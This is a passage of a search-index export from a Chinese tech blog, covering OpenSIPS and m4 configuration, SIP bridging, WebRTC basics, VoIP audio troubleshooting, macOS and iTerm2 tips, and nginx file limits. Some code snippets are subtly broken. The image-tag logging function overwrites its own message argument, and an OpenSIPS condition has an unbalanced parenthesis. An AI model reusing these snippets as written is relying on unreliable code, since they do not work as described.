be various bugs. Please feel free to mail them to the author. AUTHOR Nils Ohlmeier \u0026lt;nils at sipsak dot org\u0026gt; SEE ALSO traceroute(8) ","permalink":"https://wdd.js.org/opensips/tools/sipsak/","summary":"sipsak is a command line tool which can send simple requests to a SIP server. It can run additional tests on a SIP server which are usefull for admins and developers of SIP enviroments.\nhttps://github.com/nils-ohlmeier/sipsak\n安装 apt-get install sipsak 发送options sipsak -vv -p 192.168.2.63:5060 -s sip:8001@test.cc man SIPSAK(1) User Manuals SIPSAK(1) NAME sipsak - a utility for various tests on sip servers and user agents SYNOPSIS sipsak [-dFGhiILnNMRSTUVvwz] [-a PASSWORD ] [-b NUMBER ] [-c SIPURI ] [-C SIPURI ] [-D NUMBER ] [-e NUMBER ] [-E STRING ] [-f FILE ] [-g STRING ] [-H HOSTNAME ] [-j STRING ] [-J STRING ] [-l PORT ] [-m NUMBER ] [-o NUMBER ] [-p HOSTNAME ] [-P NUMBER ] [-q REGEXP ] [-r PORT ] [-t NUMBER ] [-u STRING ] [-W NUMBER ] [-x NUMBER ] -s SIPURI DESCRIPTION sipsak is a SIP stress and diagnostics utility.","title":"sipsak"},{"content":"以前有个iTerm2有个很贴心的功能,鼠标向下滚动时,相关命令的输出也会自动向下。\n但是不知道最近是升级系统还是升级iTerm2的原因,这个功能实现不了。😭😭😭😭😭😭😭\n例如用vim打开一个大文件,或者使用man去查看一个命令的介绍文档时。如果要想向下滚动命令的输出内容。只能按j或者按空格或者回车。然而按键虽然精确,却没有用触摸板滚动来的爽。\n为了让vim能够接受鼠标向下滚动功能,我也曾设置了 set mouse=a 这个设置虽然可以用触摸板来向下滚屏了,但是也出现了意想不到的问题。\n然后我就去研究iTerm2的配置,发现关于鼠标的配置中,有一个 Scroll wheel send arrow keys when in alternat screen mode , 把这个指设置为Yes。那么无论Vim, 还是man命令,都可以用触摸板去滚动屏幕了。\n","permalink":"https://wdd.js.org/posts/2020/07/gon16g/","summary":"以前有个iTerm2有个很贴心的功能,鼠标向下滚动时,相关命令的输出也会自动向下。\n但是不知道最近是升级系统还是升级iTerm2的原因,这个功能实现不了。😭😭😭😭😭😭😭\n例如用vim打开一个大文件,或者使用man去查看一个命令的介绍文档时。如果要想向下滚动命令的输出内容。只能按j或者按空格或者回车。然而按键虽然精确,却没有用触摸板滚动来的爽。\n为了让vim能够接受鼠标向下滚动功能,我也曾设置了 set mouse=a 这个设置虽然可以用触摸板来向下滚屏了,但是也出现了意想不到的问题。\n然后我就去研究iTerm2的配置,发现关于鼠标的配置中,有一个 Scroll wheel send arrow keys when in alternat screen mode , 把这个指设置为Yes。那么无论Vim, 还是man命令,都可以用触摸板去滚动屏幕了。","title":"iTerm2 使用触摸版向下滚动命令输出"},{"content":"Mac上的netstat和Linux上的有不少的不同之处。\n在Liunx上常使用\nLinux Mac netstat -nulp netstat -nva -p udp netsat -ntlp netsat -nva -p tcp 注意,在Mac上netstat的-n和linux上的含义相同\n","permalink":"https://wdd.js.org/posts/2020/07/hingbv/","summary":"Mac上的netstat和Linux上的有不少的不同之处。\n在Liunx上常使用\nLinux Mac netstat -nulp netstat -nva -p udp netsat -ntlp netsat -nva -p tcp 注意,在Mac上netstat的-n和linux上的含义相同","title":"mac上netstat命令"},{"content":"opensips在多实例时,会有一些数据同步策略的问题。\n~\n","permalink":"https://wdd.js.org/opensips/ch5/db-mode/","summary":"opensips在多实例时,会有一些数据同步策略的问题。\n~","title":"[todo] db_mode调优"},{"content":"相比于kamailo的脚本的预处理能力,opensips的脚本略显单薄。OpenSIPS官方也认识到了这一点,但是也并未准备如何提高这部分能力。因为OpenSIPS是想将预处理交给这方面的专家,也就是大名鼎鼎的m4(当然,你可能根本不知道m4是啥)。\n举例来说 我们看一下opensips自带脚本的中的一小块。 里面就有三个要配置的地方\n这个listen的地址: listen=udp:127.0.0.1:5060 数据库地址的配置:modparam(\u0026ldquo;usrloc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;dbdriver://username:password@dbhost/dbname\u0026rdquo;) 数据库地址的配置:modparam(\u0026ldquo;acc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;mysql://user:password@localhost/opensips\u0026rdquo;) auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;dbdriver://username:password@dbhost/dbname\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://user:password@localhost/opensips\u0026#34;) 随着脚本代码的增多,各种配置往往越来越多。真是脚本里,配置的地方远远不止三处!\n你开发了OpenSIPS的脚本,但是真正部署的服务的可能是其他人。那么其他拿到你的脚本的时候,他们怎么知道要改哪些地方呢,难道要搜索一下,所有出现#CUSTOMIZE ME的地方就是需要配置的? 难道他们每次部署一个服务,就要改一遍脚本的内容? 改错了谁负责?\n如果你不想被运维人员在背后骂娘,就不要把配置性的数据写死到脚本里!\n如果你不想在打游戏的时候被运维人员点电话问这个配置出错应该怎么解决,就不要把配置型数据写死到脚本里!\n** 那么,你就需要用到M4**\n什么是M4? M4是一种宏语言,如果你不清楚什么是宏,你就可以把M4想想成一种字符串替换的工具。\n如何安装M4? 大部分Linux上都已经默认安装了m4, 你可以用m4 --version检查一下m4是否已经存在。\nm4 --version Copyright © 2021 Free Software Foundation, Inc. GPLv3+ 许可证: GNU 通用公共许可证第三版或更高版本 \u0026lt;https://gnu.org/licenses/gpl.html\u0026gt;。 这是自由软件: 您可自由更改并重新分发它。 在法律所允许的范围内,不附带任何担保条款。 如果不存在的话,可以用对应常用的包管理工具来安装,例如\napt-get install m4 能否举个m4例子? hello-world.m4\ndefine(`hello_world\u0026#39;, `你好,世界\u0026#39;) 小王说: hello_world 然后执行: m4 hello-world.m4\n小王说: 你好,世界 效果就是 hello_world这个字符,被我们定义的字符串给替换了。\n为什么要做预处理? 我管理过的OpenSIPS脚本,最长的大概有1500行左右。刚开始接手的时候,我花了很长时间才理清脚本的功能。\n这个脚本的存在的问题是:\n大段的逻辑都集中在请求路由中,功能比较缠绕,很容易改动一个地方,导致不可预测的问题 配置性的变量和脚本融合在一起,脚本迁移时,要改动的地方比较多,容易出错 某些环境需要某些功能,某些环境有不需要某些功能,很难做到兼容,结果就导致脚本的版本太多,难以维护 处理的目标\n将比较大的请求路由,按照功能划分多个子路由,专注处理功能内部的事情,做到高内聚,低耦合。可以使用m4的include指令,将多个文件引入到一个文件中。其实OpenSIPS本身也有类似的指令,include_file,但是这个指令并不是会在运行前生成一个统一的目标文件,有时候出错,不好排查问题出现的代码行。另外Include的文件太多,也不好维护。 将配置性变量,定义成m4的宏,有m4负责统一的宏展开。配置文件可以单独拿出来,也可以由m4的命令行参数传入。 关于不同环境的差异化编译,可以使用m4的条件语句。例如当某个宏的定义时展开某个语句,或者某个宏的值等于某个值后,再include某个文件。这样就可以做到条件展开和条件引入。 ","permalink":"https://wdd.js.org/opensips/ch5/m4/","summary":"相比于kamailo的脚本的预处理能力,opensips的脚本略显单薄。OpenSIPS官方也认识到了这一点,但是也并未准备如何提高这部分能力。因为OpenSIPS是想将预处理交给这方面的专家,也就是大名鼎鼎的m4(当然,你可能根本不知道m4是啥)。\n举例来说 我们看一下opensips自带脚本的中的一小块。 里面就有三个要配置的地方\n这个listen的地址: listen=udp:127.0.0.1:5060 数据库地址的配置:modparam(\u0026ldquo;usrloc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;dbdriver://username:password@dbhost/dbname\u0026rdquo;) 数据库地址的配置:modparam(\u0026ldquo;acc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;mysql://user:password@localhost/opensips\u0026rdquo;) auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;dbdriver://username:password@dbhost/dbname\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://user:password@localhost/opensips\u0026#34;) 随着脚本代码的增多,各种配置往往越来越多。真是脚本里,配置的地方远远不止三处!\n你开发了OpenSIPS的脚本,但是真正部署的服务的可能是其他人。那么其他拿到你的脚本的时候,他们怎么知道要改哪些地方呢,难道要搜索一下,所有出现#CUSTOMIZE ME的地方就是需要配置的? 难道他们每次部署一个服务,就要改一遍脚本的内容? 改错了谁负责?\n如果你不想被运维人员在背后骂娘,就不要把配置性的数据写死到脚本里!\n如果你不想在打游戏的时候被运维人员点电话问这个配置出错应该怎么解决,就不要把配置型数据写死到脚本里!\n** 那么,你就需要用到M4**\n什么是M4? M4是一种宏语言,如果你不清楚什么是宏,你就可以把M4想想成一种字符串替换的工具。\n如何安装M4? 大部分Linux上都已经默认安装了m4, 你可以用m4 --version检查一下m4是否已经存在。\nm4 --version Copyright © 2021 Free Software Foundation, Inc. GPLv3+ 许可证: GNU 通用公共许可证第三版或更高版本 \u0026lt;https://gnu.org/licenses/gpl.html\u0026gt;。 这是自由软件: 您可自由更改并重新分发它。 在法律所允许的范围内,不附带任何担保条款。 如果不存在的话,可以用对应常用的包管理工具来安装,例如\napt-get install m4 能否举个m4例子? hello-world.","title":"使用m4增强opensips.cfg脚本预处理能力"},{"content":"There are scenarios where you need OpenSIPS to route SIP traffic across more than one IP interface. Such a typical scenario is where OpenSIPS is required to perform bridging. The bridging may be between different IP networks (like public versus private, IPv4 versus IPv6) or between different transport protocols for SIP (like UDP versus TCP versus TLS).So, how do we switch to a different outbound interface in OpenSIPS ?\nAuto detection OpenSIPS has a built in automatic way of picking up the right outbound interface, the so called “Multi homed” support or shortly “mhomed”, controlled by the mhomed core parameter.The auto detection is done based on the destination IP of the SIP message. OpenSIPS will ‘query’ the kernel routing table to see which interface (on the server) is able to route to the needed destination IP.\nExample If we have an OpenSIPS listening on 1.2.3.4 public interface and 10.0.0.4 private interface and we need to send the SIP message to 10.0.0.100, the kernel will indicate that 10.0.0.100 is reachable/routable only via 10.0.0.4, so OpenSIPS will use that listener.\nAdvantages This a very easy way to achieve multi-interface routing, without any extra scripting logic. You just have to switch a single option and it simply works.\nDisadvantages First of all there is performance penalty here as each time a SIP message is sent out OpenSIPS will have to query the kernel for the right outbound interface.Also there are some limitation – as this auto detection is based on the kernel routing table, this approach can be used only when routing between different types of networks like private versus public or IPv4 versus IPv6. It cannot be used for switching between different SIP transport protocols.Even more, there is another limitation here – you need to correlate the kernel IP routing table with the listeners you have in OpenSIPS, otherwise you may end up in a situation where the kernel indicates as outbound interface an IP that it is not configured as listener in OpenSIPS!\nManual selection An alternative is to explicitly indicate to OpenSIPS what the outbound interface should be, based on the logic from the routing script. Like if my routing logic says that the call is to be sent to an end-point and I know that all my end-points are on the public network, then I can manually indicate OpenSIPS to use the listener on the public network. Or if my routing logic says that the call goes to a media server located in a private network, then I will instruct OpenSIPS to use the private listener.How do you do this? You can indicate the outbound interface/socket by “forcing the send socket” with the $fs variable.As the send socket description also contains indication for the transport protocol, this approach can be used for switching between different SIP transport protocols:\n# switch from TCP to UDP, preserving the IP if ($proto == \u0026#34;TCP\u0026#34;) $fs = \u0026#34;udp:\u0026#34; + $Ri + \u0026#34;:5060\u0026#34;; Manually setting the outbound interface is usually done only for the initial requests (without the To header “;tag=” parameter). Why? As you have to anchor the dialog into your OpenSIPS (otherwise the sequential requests will not be routed in bridging mode), you will do either record_route(), either topology_hiding(). These two ways of anchoring dialogs in OpenSIPS guarantees that all sequential requests will follow the same interface switching / bridging as the initial request. Like if you do the interface switch at INVITE time, there is no need for additional scripting for in-dialog requests (ACK, re-INVITE, BYE, etc.). Shortly, any custom interface handling is to be done only for the initial requests.\nExample Assuming the end-points are in the public interface and the media servers are in the private network, let’s see how the logic should be.But first, an useful hint : if your routing is based on lookup(“location”), there is no need to do manual setting of the outbound interface as the lookup() function will do this for you – it will automatically force as outbound interface the interface the corresponding REGISTER was received on ;).\n# is it a call to a media service (format *33xxxxx) ? if ($rU=~\u0026#34;^*33[0-9]+$\u0026#34;)) { $fs = \u0026#34;udp:10.0.0.100:5060\u0026#34;; route(to_media); exit; } Advantages This is a very rigorous way of controlling the interface switching in your OpenSIPS script, being able to cover all cases of network or protocol switching.Also, this adds zero performance penalty!\nDisadvantages You need to do some extra scripting and to correlate your SIP routing logic with the IP/transport switching logic. Nevertheless, it is very easy to do – just set a variable, so it will not pollute your script.\nConclusions Each approach has some clear advantages – if the auto-detection is very very simple to use for some simple scenarios, the manual selection is more powerful and complex but needs some extra scripting and SIP understanding.If you want to learn more, join us for the upcoming OpenSIPS Bootcamp training session and become a skillful OpenSIPS user! :).\n原文地址:https://blog.opensips.org/2018/09/04/sip-bridging-over-multiple-interfaces/\n","permalink":"https://wdd.js.org/opensips/blog/mutltiple-interface/","summary":"There are scenarios where you need OpenSIPS to route SIP traffic across more than one IP interface. Such a typical scenario is where OpenSIPS is required to perform bridging. The bridging may be between different IP networks (like public versus private, IPv4 versus IPv6) or between different transport protocols for SIP (like UDP versus TCP versus TLS).So, how do we switch to a different outbound interface in OpenSIPS ?\nAuto detection OpenSIPS has a built in automatic way of picking up the right outbound interface, the so called “Multi homed” support or shortly “mhomed”, controlled by the mhomed core parameter.","title":"SIP bridging over multiple interfaces"},{"content":"curl ip.sb curl cip.cc ","permalink":"https://wdd.js.org/posts/2020/07/bh7hy0/","summary":"curl ip.sb curl cip.cc ","title":"获取本机外部公网IP"},{"content":"标准文档 WebRTC https://w3c.github.io/webrtc-pc/ MediaStream https://www.w3.org/TR/mediacapture-streams/ 实现接口 MediaStream: 获取媒体流,例如从用户的摄像机或者麦克风 RTCPeerConnection: 音频或者视频呼叫,以及加密和带宽管理 RTCDataChannel: 端到端的数据交互 WebRTC架构 架构图颜色标识说明:\n紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的。\n其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制\nDTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释\nICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) ","permalink":"https://wdd.js.org/fe/webrtc-notes/","summary":"标准文档 WebRTC https://w3c.github.io/webrtc-pc/ MediaStream https://www.w3.org/TR/mediacapture-streams/ 实现接口 MediaStream: 获取媒体流,例如从用户的摄像机或者麦克风 RTCPeerConnection: 音频或者视频呼叫,以及加密和带宽管理 RTCDataChannel: 端到端的数据交互 WebRTC架构 架构图颜色标识说明:\n紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的。\n其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制\nDTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释","title":"Webrtc Notes"},{"content":"通话质量差,一般可能以下因素有关。\n媒体服务器或者媒体代理服务器CPU, 内存异常 通信网络差 中继或者网关送过来的本来音质就不好。 解决思路:\n这个需要监控媒体服务器或者媒体代理CPU,内存是否正常 也可以在媒体代理上用tupdump抓包,然后用wireshark分析 调听服务端的录音,看看服务端录音是否也存在音质差的问题 ","permalink":"https://wdd.js.org/opensips/ch7/poor-quality/","summary":"通话质量差,一般可能以下因素有关。\n媒体服务器或者媒体代理服务器CPU, 内存异常 通信网络差 中继或者网关送过来的本来音质就不好。 解决思路:\n这个需要监控媒体服务器或者媒体代理CPU,内存是否正常 也可以在媒体代理上用tupdump抓包,然后用wireshark分析 调听服务端的录音,看看服务端录音是否也存在音质差的问题 ","title":"通话质量差"},{"content":" 这个问题很大可能和和SDP没有正确修改有关。需要排查SIP信令的sdp地址是否正确。 防火墙策略问题:有的网络允许udp出去,但是不允许udp进来。需要设置防火墙策略。 udp端口范围太小。一般一个通话需要占用4个udp端口。如果开放的udp端口太少,在通话达到一定数量后,就会出现一部分呼叫没有可用端口。 用户设备的问题。例如用户的电脑声卡或者扬声器出现问题。 由于网络的复杂性,还有很多可能 一般遇到这个问题,可以按照如下的思路排查:\n服务端有录音功能的,可以先在服务端听录音,看看服务端录音里是否正常。一般来说有四种情况。 两方的录音都没有 主叫方有,被叫方没有 被叫方有,主叫方没有 主被叫都有。但是就是一方听不到另一方。 通过排查服务端的录音,就可以大致知道到底是AB两个leg, 每个leg上的语音流收发的情况。\n从信令的的sdp中分析,这个需要一定的SIP协议的分析能力。有些时候,sdp里面的媒体地址不正确,也会导致媒体流无法正常首发。 NAT策略。NAT一般有四种,用的比较多的是端口限制型。这种NAT要求外网流量在进入NAT内部时,必需先有内部的流量出去。当内部流量出去之后,这个NAT洞才会出现,外部的流量才能从这个洞进入。如果NAT内部设备一直不发送rtp包,那么外部的流量即使进来,也会被防火墙拦截掉。 无论是运维人员还是开发人员,在遇到媒体流问题时,一定要先搞清楚整个软交换的网络拓扑架构。否则只能南辕北辙。 sngrep -cr, 加上r这个参数,可以实时观察媒体流的流动情况。是个非常好的功能。但是对于那种加密的媒体流,sngrep是抓不到的,这点要注意。常见的WebRTC的媒体流就是加密的。 最终如果还是解决不了,那么只能祭出最后的杀器:tcpdump + wireshark。服务端抓包的话,虽然sngrep可以抓包,但是比较浪费内存还可能会出现丢包。最好用tcpdump抓包成文件,然后在wireshark上分析。 ","permalink":"https://wdd.js.org/opensips/ch7/one-leg-audio/","summary":" 这个问题很大可能和和SDP没有正确修改有关。需要排查SIP信令的sdp地址是否正确。 防火墙策略问题:有的网络允许udp出去,但是不允许udp进来。需要设置防火墙策略。 udp端口范围太小。一般一个通话需要占用4个udp端口。如果开放的udp端口太少,在通话达到一定数量后,就会出现一部分呼叫没有可用端口。 用户设备的问题。例如用户的电脑声卡或者扬声器出现问题。 由于网络的复杂性,还有很多可能 一般遇到这个问题,可以按照如下的思路排查:\n服务端有录音功能的,可以先在服务端听录音,看看服务端录音里是否正常。一般来说有四种情况。 两方的录音都没有 主叫方有,被叫方没有 被叫方有,主叫方没有 主被叫都有。但是就是一方听不到另一方。 通过排查服务端的录音,就可以大致知道到底是AB两个leg, 每个leg上的语音流收发的情况。\n从信令的的sdp中分析,这个需要一定的SIP协议的分析能力。有些时候,sdp里面的媒体地址不正确,也会导致媒体流无法正常首发。 NAT策略。NAT一般有四种,用的比较多的是端口限制型。这种NAT要求外网流量在进入NAT内部时,必需先有内部的流量出去。当内部流量出去之后,这个NAT洞才会出现,外部的流量才能从这个洞进入。如果NAT内部设备一直不发送rtp包,那么外部的流量即使进来,也会被防火墙拦截掉。 无论是运维人员还是开发人员,在遇到媒体流问题时,一定要先搞清楚整个软交换的网络拓扑架构。否则只能南辕北辙。 sngrep -cr, 加上r这个参数,可以实时观察媒体流的流动情况。是个非常好的功能。但是对于那种加密的媒体流,sngrep是抓不到的,这点要注意。常见的WebRTC的媒体流就是加密的。 最终如果还是解决不了,那么只能祭出最后的杀器:tcpdump + wireshark。服务端抓包的话,虽然sngrep可以抓包,但是比较浪费内存还可能会出现丢包。最好用tcpdump抓包成文件,然后在wireshark上分析。 ","title":"一方听不到另外一方的声音"},{"content":"在通话接近30秒时,呼叫自动挂断。\n有很大的可能和丢失了ACK有关。这个需要用sngrep去抓包看SIP时序图来确定是否是ACK丢失。\n丢失ACK的原因很大可能是NAT没有处理好,或者是网络协议不匹配等等。\n","permalink":"https://wdd.js.org/opensips/ch7/30-seconds-drop/","summary":"在通话接近30秒时,呼叫自动挂断。\n有很大的可能和丢失了ACK有关。这个需要用sngrep去抓包看SIP时序图来确定是否是ACK丢失。\n丢失ACK的原因很大可能是NAT没有处理好,或者是网络协议不匹配等等。","title":"30秒自动挂断"},{"content":"exec user process caused \u0026#34;no such file or diectory\u0026#34; 解决方案: 将镜像构建的 Dockerfile ENTRYPOINT [\u0026quot;/run.sh\u0026quot;] 改为下面的\nENTRYPOINT [\u0026#34;sh\u0026#34;,\u0026#34;/run.sh\u0026#34;] 其实就是加了个sh\n","permalink":"https://wdd.js.org/posts/2020/07/docker-exec-user-process/","summary":"exec user process caused \u0026#34;no such file or diectory\u0026#34; 解决方案: 将镜像构建的 Dockerfile ENTRYPOINT [\u0026quot;/run.sh\u0026quot;] 改为下面的\nENTRYPOINT [\u0026#34;sh\u0026#34;,\u0026#34;/run.sh\u0026#34;] 其实就是加了个sh","title":"exec user process caused no such file or diectory"},{"content":"function report(msg:string){ var msg = new Image() msg.src = `/report?log=${msg}` } report ","permalink":"https://wdd.js.org/posts/2020/07/koow4y/","summary":"function report(msg:string){ var msg = new Image() msg.src = `/report?log=${msg}` } report ","title":"使用image标签上传日志"},{"content":"python Flask框架报错。刚开始我只关注了这个报错,没有看到这个报错上上面还有一个报错\nModuleNotFoundError: No module named \u0026#39;http.client\u0026#39;; \u0026#39;http\u0026#39; is not a package 实际上问题的关键其实是 'http' is not a package , 为什么会有这个报错呢?\n其实因为我自己在项目目录里新建一个叫做http.py的文件,这个文件名和python的标准库重名了,就导致了后续的一系列的问题。\n问题总结 文件名一定不要和某些标准库的文件名相同 排查问题的时候,一定要首先排查最先出现问题的点 ","permalink":"https://wdd.js.org/posts/2020/07/ncigfk/","summary":"python Flask框架报错。刚开始我只关注了这个报错,没有看到这个报错上上面还有一个报错\nModuleNotFoundError: No module named \u0026#39;http.client\u0026#39;; \u0026#39;http\u0026#39; is not a package 实际上问题的关键其实是 'http' is not a package , 为什么会有这个报错呢?\n其实因为我自己在项目目录里新建一个叫做http.py的文件,这个文件名和python的标准库重名了,就导致了后续的一系列的问题。\n问题总结 文件名一定不要和某些标准库的文件名相同 排查问题的时候,一定要首先排查最先出现问题的点 ","title":"ModuleNotFoundError: No module named 'SocketServer'"},{"content":"iTerm我已经使用了很长时间了,总体各方面的特点都非常好,但是有几个地方也是让我苦恼的地方。\ntab 页面的标题会根据执行的命令或者路径发生变化,如果你开了七八个ssh远程,有时候很难区分这个tab页面到底是连接的哪台机器。 如果你有十几个机器需要连接,你不可能手动输入ssh root@ip地址的方式去连接,太多了记不住。 如何维护多个远程host? 使用profile维护多个远程host, 每个profile对应连接到一台机器。profile name填入该host的名字。\n注意右边的Command, Send text at start的输入框,这个输入框,就是要执行的ssh指令,里面包含了远程host的地址。\n然后你就可以在Profils的菜单中选择一个profile进行连接了。\n如何让tab页面的标题不改变? 一定不要勾选Applications in terminal may change the title, 默认这项是勾选的。 Ttile一定要选择Name, badge的妙用? 如果标签页的tab的名称还不够强调当前tab页面是连接哪个标签页面的,你可以用用Badge去强调一下。\n","permalink":"https://wdd.js.org/posts/2020/06/ba84a7/","summary":"iTerm我已经使用了很长时间了,总体各方面的特点都非常好,但是有几个地方也是让我苦恼的地方。\ntab 页面的标题会根据执行的命令或者路径发生变化,如果你开了七八个ssh远程,有时候很难区分这个tab页面到底是连接的哪台机器。 如果你有十几个机器需要连接,你不可能手动输入ssh root@ip地址的方式去连接,太多了记不住。 如何维护多个远程host? 使用profile维护多个远程host, 每个profile对应连接到一台机器。profile name填入该host的名字。\n注意右边的Command, Send text at start的输入框,这个输入框,就是要执行的ssh指令,里面包含了远程host的地址。\n然后你就可以在Profils的菜单中选择一个profile进行连接了。\n如何让tab页面的标题不改变? 一定不要勾选Applications in terminal may change the title, 默认这项是勾选的。 Ttile一定要选择Name, badge的妙用? 如果标签页的tab的名称还不够强调当前tab页面是连接哪个标签页面的,你可以用用Badge去强调一下。","title":"iTerm2技巧 维护多个host与固定tab页面标题"},{"content":" 首先去官网查看一下,macos的系统版本和硬件以及ipad的版本是否支持随航。这是前提条件。 macos 和 ipad 需要登录同一个AppleID macos和iPad需要在同一个Wi-Fi下 遇到报错提示链接超时时:\nMacOS 退出apple账号,然后重新登录,登录完了之后重启电脑 再次尝试连接,就可以连接成功了。\n","permalink":"https://wdd.js.org/posts/2020/06/yh0oty/","summary":"首先去官网查看一下,macos的系统版本和硬件以及ipad的版本是否支持随航。这是前提条件。 macos 和 ipad 需要登录同一个AppleID macos和iPad需要在同一个Wi-Fi下 遇到报错提示链接超时时:\nMacOS 退出apple账号,然后重新登录,登录完了之后重启电脑 再次尝试连接,就可以连接成功了。","title":"MacOS 随航功能链接ipad超时"},{"content":"macos 升级后,发现git等命令都不可用了。\n第一次使用xcode-select \u0026ndash;install, 有报错。于是就用brew 安装了git。\nxcode-select --install 后续使用其他命令是,发现gcc命令也不可用。于是第二天又用 xcode-select --install 执行了一遍,忽然又可以正常安装开发软件了。\n所以又把brew 安装的git给卸载了。\n","permalink":"https://wdd.js.org/posts/2020/06/wetv3e/","summary":"macos 升级后,发现git等命令都不可用了。\n第一次使用xcode-select \u0026ndash;install, 有报错。于是就用brew 安装了git。\nxcode-select --install 后续使用其他命令是,发现gcc命令也不可用。于是第二天又用 xcode-select --install 执行了一遍,忽然又可以正常安装开发软件了。\n所以又把brew 安装的git给卸载了。","title":"xcrun: error: invalid active developer path"},{"content":"最近遇到一个问题,WebSocket总是会在下午出现比较大的断开的量。\n首先怀疑的是客户端的网络到服务端的网络出现抖动或者断开,要么就是入口的nginx有异常,或者是内部的服务出现异常。\n排查下来,发现nginx的最大打开文件个数是1024\nnginx master进程\nnginx work进程\n当进程打开文件数超过限制时,会发生什么? 当进程超过最大打开文件限制时,会收到SIGXFSZ信号。这个信号会默认行为会杀死一个进程。进程内部也可以捕获这个信号。\n我试着向nginx wrok进程发送SIGXFSZ信号, work进程会退出,然后master监听了这个事件后,会重新启动一个work进程。\nkill -XFSZ work_pid 在nginx的error.log文件中,可以看到类似的日志输出。\n这里的25就是XFSZ信号的整数表示。\n... [alert] ...#.: work process ... exited on signal 25 _\n参考 https://www.monitis.com/blog/6-best-practices-for-optimizing-your-nginx-performance/ https://www.cnblogs.com/shansongxian/p/9989631.html https://www.cnblogs.com/jpfss/p/9755706.html https://man7.org/linux/man-pages/man2/getrlimit.2.html https://man7.org/linux/man-pages/man5/proc.5.html 